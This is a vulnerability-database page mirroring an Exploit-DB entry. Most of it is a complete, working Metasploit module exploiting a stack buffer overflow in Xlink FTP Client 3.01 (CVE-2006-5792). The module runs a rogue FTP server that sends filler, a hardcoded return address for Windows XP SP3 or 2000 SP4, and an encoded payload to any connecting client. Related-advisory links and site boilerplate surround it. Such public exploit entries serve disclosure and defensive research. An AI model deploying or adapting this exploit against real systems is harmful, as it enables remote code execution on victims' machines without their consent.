Lucene search
K

Xlink FTP Client - Remote Buffer Overflow (Metasploit)

šŸ—“ļøĀ 11 Nov 2010Ā 00:00:00Reported byĀ MetasploitTypeĀ 
exploitdb
Ā exploitdb
šŸ”—Ā www.exploit-db.comšŸ‘Ā 48Ā Views

Xlink FTP Client Buffer Overflow in Version 3.01 allows remote execution of arbitrary code

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2006-5792
11 Nov 201000:00
–circl
Check Point Advisories
Xlink FTP Server Request Buffer Overflow (CVE-2006-5792)
14 Oct 201500:00
–checkpoint_advisories
CVE
CVE-2006-5792
7 Nov 200623:00
–cve
Cvelist
CVE-2006-5792
7 Nov 200623:00
–cvelist
Exploit DB
Xlink FTP Server - Remote Buffer Overflow (Metasploit)
11 Nov 201000:00
–exploitdb
Metasploit
Xlink FTP Client Buffer Overflow
3 Oct 200923:05
–metasploit
Metasploit
Xlink FTP Server Buffer Overflow
3 Oct 200923:05
–metasploit
NVD
CVE-2006-5792
7 Nov 200623:07
–nvd
Packet Storm
Xlink FTP Client Buffer Overflow
26 Nov 200900:00
–packetstorm
Packet Storm
Xlink FTP Server Buffer Overflow
26 Nov 200900:00
–packetstorm
Rows per page
##
# $Id: xlink_client.rb 10998 2010-11-11 22:43:22Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::TcpServer

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Xlink FTP Client Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Xlink FTP Client 32
				Version 3.01 that comes bundled with Omni-NFS Enterprise 5.2.
				When a overly long FTP server response is recieved by a client,
				arbitrary code may be executed.
			},
			'Author' 	 => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10998 $',
			'References'     =>
				[
					[ 'CVE', '2006-5792' ],
					[ 'OSVDB', '33969' ],
					[ 'URL', 'http://www.metasploit.com/' ],
					[ 'URL', 'http://www.xlink.com' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 550,
					'BadChars' => "\x00\x0a\x0d\().,",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows XP Pro SP3 English', { 'Ret' => 0x7d054897 } ],
					[ 'Windows 2000 SP4 English', 	{ 'Ret' => 0x7ce02a2d } ],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Oct 3 2009',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptPort.new('SRVPORT', [ true, "The FTP daemon port to listen on", 21 ]),
			], self.class)
	end

	def on_client_connect(client)

		return if ((p = regenerate_payload(client)) == nil)

		sploit =  rand_text_alpha_upper(260) + [target.ret].pack('V') + payload.encoded
		sploit << rand_text_alpha_upper(1024 - payload.encoded.length) + "\r\n"

		print_status("Sending #{self.name}...")
		client.put(sploit)

		handler(client)
		service.close_client(client)

	end
end

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Nov 2010 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
EPSS0.66771
48